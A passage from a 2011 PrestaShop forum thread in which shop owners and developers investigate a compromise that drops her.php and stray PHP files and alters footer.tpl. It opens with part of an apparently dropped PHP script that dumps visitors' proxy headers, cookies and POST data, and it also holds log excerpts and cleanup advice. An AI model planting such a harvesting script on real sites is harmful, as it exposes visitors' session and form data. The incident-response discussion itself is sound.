   if(isset($_SERVER['HTTP_HTTP_VIA'])) $DATA_HTTP_HTTP_VIA=filt($_SERVER['HTTP_HTTP_VIA']); else $DATA_HTTP_HTTP_VIA=$empty;
   if(isset($_SERVER['HTTP_XROXY_CONNECTION'])) $DATA_HTTP_XROXY_CONNECTION=filt($_SERVER['HTTP_XROXY_CONNECTION']); else $DATA_HTTP_XROXY_CONNECTION=$empty;
   if(isset($_SERVER['HTTP_PROXY_CONNECTION'])) $DATA_HTTP_PROXY_CONNECTION=filt($_SERVER['HTTP_PROXY_CONNECTION']); else $DATA_HTTP_PROXY_CONNECTION=$empty;
   if(isset($_SERVER['HTTP_PROXY_USER'])) $DATA_HTTP_PROXY_USER=filt($_SERVER['HTTP_PROXY_USER']); else $DATA_HTTP_PROXY_USER=$empty;
   if(isset($_SERVER['HTTP_PC_REMOTE_ADDR'])) $DATA_HTTP_PC_REMOTE_ADDR=filt($_SERVER['HTTP_PC_REMOTE_ADDR']); else $DATA_HTTP_PC_REMOTE_ADDR=$empty;
   if(isset($_SERVER['HTTP_X_REMOTECLIENT_IP'])) $DATA_HTTP_X_REMOTECLIENT_IP=filt($_SERVER['HTTP_X_REMOTECLIENT_IP']); else $DATA_HTTP_X_REMOTECLIENT_IP=$empty;
   if(isset($_SERVER['HTTP_PROXY_PORT'])) $DATA_HTTP_PROXY_PORT=filt($_SERVER['HTTP_PROXY_PORT']); else $DATA_HTTP_PROXY_PORT=$empty;
   if(isset($_SERVER['HTTP_USER_AGENT'])) $DATA_HTTP_USER_AGENT=filt($_SERVER['HTTP_USER_AGENT']); else $DATA_HTTP_USER_AGENT=$empty;
   if(isset($_SERVER['HTTP_REFERER'])) $DATA_HTTP_REFERER=filt($_SERVER['HTTP_REFERER']); else $DATA_HTTP_REFERER=$empty;
   if(isset($_SERVER['HTTP_ACCEPT'])) $DATA_HTTP_ACCEPT=filt($_SERVER['HTTP_ACCEPT']); else $DATA_HTTP_ACCEPT=$empty;
   if(isset($_SERVER['HTTP_CONNECTION'])) $DATA_HTTP_CONNECTION=filt($_SERVER['HTTP_CONNECTION']); else $DATA_HTTP_CONNECTION=$empty;
   if(isset($_SERVER['GATEWAY_INTERFACE'])) $DATA_GATEWAY_INTERFACE=filt($_SERVER['GATEWAY_INTERFACE']); else $DATA_GATEWAY_INTERFACE=$empty;
   if(isset($_SERVER['REQUEST_METHOD'])) $DATA_REQUEST_METHOD=filt($_SERVER['REQUEST_METHOD']); else $DATA_REQUEST_METHOD=$empty;
   if(isset($_COOKIE)) $_COOKIE=filt($_COOKIE); else $_COOKIE=$empty;
   if(isset($_POST)) $_POST=filt($_POST); else $_POST=$empty;

$data = "<pre>REQUEST_INFO_PAGE_4896485_CODE
REMOTE_ADDR=".filt($_SERVER['REMOTE_ADDR'])."
HTTP_CLIENT_IP=".$DATA_HTTP_CLIENT_IP."
HTTP_X_FORWARDED_FOR=".$DATA_HTTP_X_FORWARDED_FOR."
HTTP_X_FORWARDED=".$DATA_HTTP_FORWARDED_FOR."
HTTP_X_COMING_FROM=
HTTP_FORWARDED_FOR=".$DATA_HTTP_FORWARDED_FOR."
HTTP_FORWARDED=
HTTP_COMING_FROM=
HTTP_VIA=".$DATA_HTTP_HTTP_VIA."
HTTP_XROXY_CONNECTION=".$DATA_HTTP_XROXY_CONNECTION."
HTTP_PROXY_CONNECTION=".$DATA_HTTP_PROXY_CONNECTION."
HTTP_USER_AGENT=".$DATA_HTTP_USER_AGENT."
HTTP_ACCEPT=".$DATA_HTTP_ACCEPT."
HTTP_CONNECTION=".$DATA_HTTP_CONNECTION."
GATEWAY_INTERFACE=".$DATA_GATEWAY_INTERFACE."
REQUEST_METHOD=".$DATA_REQUEST_METHOD."
HTTP_REFERER=".$DATA_HTTP_REFERER."
POST=".$_POST."
COOKIE=".$_COOKIE."
</pre>
   ";

echo $data;
?>

Share this post


Link to post
Share on other sites

Hi,

 

Same problem in 1.4.4 on a local install of prestashop.

 

My apache shows that the her.php file appeared just after a serie of admin actions. Here are the last :

 

 

127.0.0.1 - - [23/Aug/2011:23:27:54 +0200] "POST [...my_local_admin]/ajax.php HTTP/1.1" 200 - "http://localhost/[...my_local_admin]/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

127.0.0.1 - - [23/Aug/2011:23:27:58 +0200] "POST [...my_local_admin]/ajax.php?toggleScreencast HTTP/1.1" 200 - "http://localhost/[...my_local_admin]/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

127.0.0.1 - - [23/Aug/2011:23:27:55 +0200] "POST /[...my_local_admin]/index.php?tab=AdminModules&token=c76a0756b0d565653ca9aabf3e5a35e HTTP/1.1" 200 301411 "http://localhost/[...my_local_admin]/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

---- and now the her php file------

127.0.0.1 - - [23/Aug/2011:23:27:59 +0200] "GET /[...my_local_module_folder]/her.php HTTP/1.1" 200 - "http://localhost/_____Gedone/_Cap_Expresso/html/www2.capexpresso.com/admincap/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

 

But i can't find her.php in my modules folder...

 

And now my IE (that i rarely open) opens itself on http://ads.eorezo.com/cgi-bin/advert/getads?x_......

 

My two other sites (1.3.6 not upgraded to 1.4)on online servers don't seem to be affected by this problem...

Share this post


Link to post
Share on other sites

same problem:

- e66943f1495e1631affdbddae8398209.php file in the download and upload folder

- script in the footer.tpl

 

my shop ver is 1.4.2.5

 

is there any modification that is have to check?

 

if you find the solution for this hack, please tell us how can we protect the site not with just a new release (it not possible for me to update to a newer release)

 

regards,

Gabor

Share this post


Link to post
Share on other sites

would you advise going back to an older version?

 

replaced footer.tpl

removed several dogdy looking image files for house, pharmacy, car sales in Modules\avoir\ folder??!!

index.php had been amended

smarty.v2 removed and now reinstated

Share this post


Link to post
Share on other sites

I did check for other added or modified files when I discovered the hack, by searching for all files with a recent timestamp. The only, apparent, changes I could find have already been reported in this topic.

In short, these are the changes:

 

1)a script is added to the footer.tpl file in the active theme folder

 

2)a php file is created in both /upload and /download folders

 

3).htaccess file in /download folder is deleted

 

4) tools/smarty/compile, tools/smarty/cache and tools/smarty_v2 are deleted (I haven't checked this myself)

 

5) if you're lucky enough to catch it, there is a her.php file in your /modules folder. But this file deletes itself after the hack attempt.

 

I would advise to check all this in your own installation and if needed restore a backup of your footer.tpl, delete the alien php files, restore .htaccess file in /download folder (not necessary if this folder is empty) and restore the smarty folders.

 

In addition, it is also important to change your password for access of your BO (though I think this info is send encrypted to the hackers but just to be safe) and to change the username/password of your database access (and change this in your BO accordingly).

 

Also, recompile and clear the cache (enable 'Force compile' and disable 'Cache' in your 'Preferences' tab in your BO and do a refresh of your website; don't forget to revert the settings afterwards).

 

And hopefully the Prestashop developers will find out the source of all this quickly.

Share this post


Link to post
Share on other sites

same problem:

- e66943f1495e1631affdbddae8398209.php file in the download and upload folder

- script in the footer.tpl

 

Idem with 1.4.4.0 on local install.

 

Same issues here. Found extra files in both download and upload folders. Tried to revert to older backup files and it added an .htaccess to one of the folders.

 

What is the status of this situation? Does PS have a solution? This is very serious.

Share this post


Link to post
Share on other sites

We were affected as well. v1.4.3.

 

Can confirm that smarty_v2 was deleted, there was the extra files in download and upload and the footer.tpl was changed (it wasn't the default template either which was interesting).

 

My install of PS had all the modules so I'm going through and deleting the unused ones.

Share this post


Link to post
Share on other sites

Hi All,

I'm new to PrestaShop and just made my shop live, I was just browsing the forum and come across this Hack

I checked my files and it seems I have the same problem.

 

I deleted the .php files in the upload download folder got rid of the strange code inside the footer.tpl

 

it appears my main htaccess file was not altered added the htaccess redir as suggested in redit

 

I'm considering a new install but, what if I get infected again?

 

any advice

 

tks

 

jesan

Share this post


Link to post
Share on other sites

Looks like there are a few similair calls made. however, it's 3 hours between.

 

xx.xxx.xxx.xxx - - [23/Aug/2011:13:27:30 +0200] "POST /admindir/index.php?tab=AdminModules&token=8a94cca32ee3c07af0bf7322428e09cc HTTP/1.1" 200 29229 "http://www.domainname.com/admindir/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17"

 

yy.yyy.yy.yy - - [23/Aug/2011:16:33:36 +0200] "GET /sv/hem HTTP/1.1" 200 25448 "http://www.google.se/url?sa=t&source=web&cd=5&ved=0CEAQFjAE&url=http%3A%2F%2Fwww.domainname.com%2F&rct=j&q=domainname.com%2Bher.php&ei=rLpTTu-PG4aJrAeV6t3DDg&usg=AFQjCNFhhEF9BsO6NxutBpe4kvvZNPG1iA&cad=rjt" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

Share this post


Link to post
Share on other sites

I got afected too.

so sad =(

:angry:

a lot of lost and resourses wasted.

=(

If need anything to solve this let me know.

=)

 

 

Looks like there are a few similair calls made. however, it's 3 hours between.

 

xx.xxx.xxx.xxx - - [23/Aug/2011:13:27:30 +0200] "POST /admindir/index.php?tab=AdminModules&token=8a94cca32ee3c07af0bf7322428e09cc HTTP/1.1" 200 29229 "http://www.domainname.com/admindir/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17"

 

yy.yyy.yy.yy - - [23/Aug/2011:16:33:36 +0200] "GET /sv/hem HTTP/1.1" 200 25448 "http://www.google.se/url?sa=t&source=web&cd=5&ved=0CEAQFjAE&url=http%3A%2F%2Fwww.domainname.com%2F&rct=j&q=domainname.com%2Bher.php&ei=rLpTTu-PG4aJrAeV6t3DDg&usg=AFQjCNFhhEF9BsO6NxutBpe4kvvZNPG1iA&cad=rjt" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

Share this post


Link to post
Share on other sites

I got afected too.

so sad =(

:angry:

a lot of lost and resourses wasted.

=(

If need anything to solve this let me know.

=)

 

My guess at this time is that we are dealing with some kind of malware, that has infected your computer, this malware then uses the module upload feature in Prestashop to upload this file.

 

I would suggest the following until a more permanent fix is made.

 

1. Either remove write permission on modules folder, or uncomment the following code from

/admin/tabs/adminModules.php

function extractArchive($file)
{
/*
	global $currentIndex;
	$success = false;
	if (substr($file, -4) == '.zip')
	{
		if (!Tools::ZipExtract($file, _PS_MODULE_DIR_))
			$this->_errors[] = Tools::displayError('Error while extracting module (file may be corrupted).');
	}
	else
	{
		$archive = new Archive_Tar($file);
		if ($archive->extract(_PS_MODULE_DIR_))
			$success = true;
		else
			$this->_errors[] = Tools::displayError('Error while extracting module (file may be corrupted).');
	}

	@unlink($file);
	if ($success)
		Tools::redirectAdmin($currentIndex.'&conf=8'.'&token='.$this->token);
*/
}

2. Make sure your computer is safe! Scan for malware/viruses, use an up to date antivirus software. Make sure you have a firewall installed, even if you are behind a router, it is good to have a software firewall, especially if you use a wireless network at home or at work.

Share this post


Link to post
Share on other sites

Test upgrading to SVN8151 version and saw the problem. Don't think its from localhost machine.

 

Observation:

her.php file added

upload dir with additional file

dowload dir with additional file

themes/prestashop/footer.tpl altered

smarty/cache/* changed

smarty/compile/* changed

 

Categories FO not showing

3rd party homecarousel not working anymore

Share this post


Link to post
Share on other sites

My shop is not affected. I haven't the file her.php, nor the file footer.tpl affected.

 

My hosting is Spanish and my shop is only available in Spanish.

 

It is odd that affected stores, and sometimes not. Could it be that the virus appears for a module such as Facebook?.

 

Prestashop 1.4.4

Share this post


Link to post
Share on other sites

OK this has just happen to me again.

 

Yesterday my store went down and after reading this thread, I deleted the php file in the upload/download folders and reverted to the original footer file. I also had to reinstall the tools/smarty/compile and tools/smarty/cache folders along with smarty_v2 folder. After this everything seemed OK.

 

This morning exactly the same thing has happened again. This needs sorting ASAP.

Share this post


Link to post
Share on other sites

I have just had my site restored by my host Vidahost I had tried to replace the tools directory and I still had problems with the log in page as there was a security error coming up in browser.

 

So the only way that would eliminate this was to restore all the files and everything seems back to normal now.

 

Regards,

 

Mark.

Share this post


Link to post
Share on other sites

I checked my store files and it seems I have the same problem.

 

I deleted the .php files in the upload and download folder and restored footer.tpl

i have also deleted all files in smarty/cache and smarty/compile

 

I did not find the file her.php in modules folder

 

prestashop 1.4.4.0

Share this post


Link to post
Share on other sites

As Mike said, the whole team is working on this issue.

 

We are trying to fix it as fast as possible.

 

We will keep you informed of any progress.

 

Be assured that we do not take this problem lightly and that we are totally dedicated to fixing it.

Share this post


Link to post
Share on other sites

Just checked my sites & my clients sites & it seems to be only 1.4.3 & 1.4.4 affected so far. One site is in maintenance mode & was still affected.

I'm now going to try a clean install on wamp & see what the logs say after.

Share this post


Link to post
Share on other sites

Last entry line in Apache log after local install on wamp

 

127.0.0.1 - - [24/Aug/2011:10:31:57 +0200] "GET /test_virus/modules/her.php HTTP/1.1" 200 -

 

Then the her.php has gone but footer.tpl has been modified.

 

PrestaShop 1.4.4

 

BTW this was a clean install with no extra modules. Zip downloaded from PrestaShop on 20/08/11

Edited by dazzza (see edit history)

Share this post


Link to post
Share on other sites

Hello,

for all people affected by this problem, if possible we need your apache log to check how this issue happened on your site and try to correct it the faster possible. You can send your logs to Carl.

 

Regards

Attached is my log from this morning.

 

I installed niceforms and jbx_menu modules yesterday onto other sites on local host - these sites use the default theme and weren't affected.

 

I installed jbx_menu on this site this morning and shortly after the footer.tpl file in a custom theme was affected.

 

I can upload earlier logs if necessary - there is no other reference to her.php in my logs.

PurpleEdge.zip

Share this post


Link to post
Share on other sites

I'm using jbx_menu as well...

Can all the people who have posted here and encountered the same problem confirm that they are using this menu?

 

I use the blocktopmenu from JBX too. No hack at all. BUT I run on an IIS (no Apache) which has no .htaccess so the script will not work, I too use a module called protect.tpl from samhda. It helps to protect your theme if script name are not known...

 

I use Geo-Targeting to block all the countries I don't sell to and for known bad-behaviour countries (listed on project honeypot or other similar.)

 

I run several bot-traps and firewall security on my server, because I've had a hacked server in the past with php-BB-forum software.

 

The security theme is a wide complexe theme and it does not mean that file xy was hacked, that this file was the reason for the hack. In most cases some other open JS are the reason for intrusions AND no software is really secure...

You must make your server secure to be not hacked.

Share this post


Link to post
Share on other sites

This is my test finding.

 

Using SVN version_8151 to do a fresh installation (localhost)

 

Immediately after installation...access FO ---> no her.php file found

Then try access to BO by keying in password ---> her.php file was generated

No other files found in upload and download directory

Footer.tpl not altered

==continuing with further monitoring & testing

 

 

Please find attached access.log for your investigation.

access.txt

Share this post


Link to post
Share on other sites

Hello,

for those who can reproduce this bug in localhost, can you please remade an install, and before you do any action on your prestashop please add the following code :

		if ($_POST)
	{
		$fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a');
		fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n");
		fclose($fd);
	}

bellow the code

	function __construct()
{

in file admin/tabs/adminModules.php. Once you have noticed the presence of her.php infection, please send me per MP the log file her_log.txt in your Prestashop root folder, thank you :D

Share this post


Link to post
Share on other sites

I got hacked too, website comes up with error 500.

 

I deleted the sus files as mentioned but I still get error 500.

 

How do I fix to get my client back online?

 

error log:

 

[24-Aug-2011 17:22:00] PHP Fatal error: require_once() [<a href='function.require'>function.require</a>]: Failed opening required '/home/thumpmus/public_html/tools/smarty_v2/Smarty.class.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/thumpmus/public_html/config/smarty.config.inc.php on line 33

Share this post


Link to post
Share on other sites

I got hacked too, website comes up with error 500.

 

I deleted the sus files as mentioned but I still get error 500.

 

How do I fix to get my client back online?

 

error log:

 

[24-Aug-2011 17:22:00] PHP Fatal error: require_once() [<a href='function.require'>function.require</a>]: Failed opening required '/home/thumpmus/public_html/tools/smarty_v2/Smarty.class.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/thumpmus/public_html/config/smarty.config.inc.php on line 33

 

Hi,

 

Try to re-upload your prestashop.

And check:

- /tools/smarty_v2/ exists

- /modules/her.php do NOT exists

 

Best regards,

Share this post


Link to post
Share on other sites

I'm curious for those infected what operating system you use ?

 

But as said Raphael, it's coming after the call of AdminModule

 

We keep you informed about any news.

 

Best regards

 

Hi Vincent, I am using a linux operating system if that helps.

 

Regards,

 

Mark.

Share this post


Link to post
Share on other sites

Hello,

for those who can reproduce this bug in localhost, can you please remade an install, and before you do any action on your prestashop please add the following code :

		if ($_POST)
	{
		$fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a');
		fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n");
		fclose($fd);
	}

bellow the code

	function __construct()
{

in file admin/tabs/adminModules.php. Once you have noticed the presence of her.php infection, please send me per MP the log file her_log.txt in your Prestashop root folder, thank you :D

Share this post


Link to post
Share on other sites

Also infected on at least two sites (1.4.4.0), but apparently not all my PS sites. But I have to ftp access at the office... One of the infected sites has absolutety no additional modules (it's a test site).

 

Hosted on a Linux Debian OS. Websites uploaded from my Windows 7 (with MS Essential Security) and Filezilla.

Share this post


Link to post
Share on other sites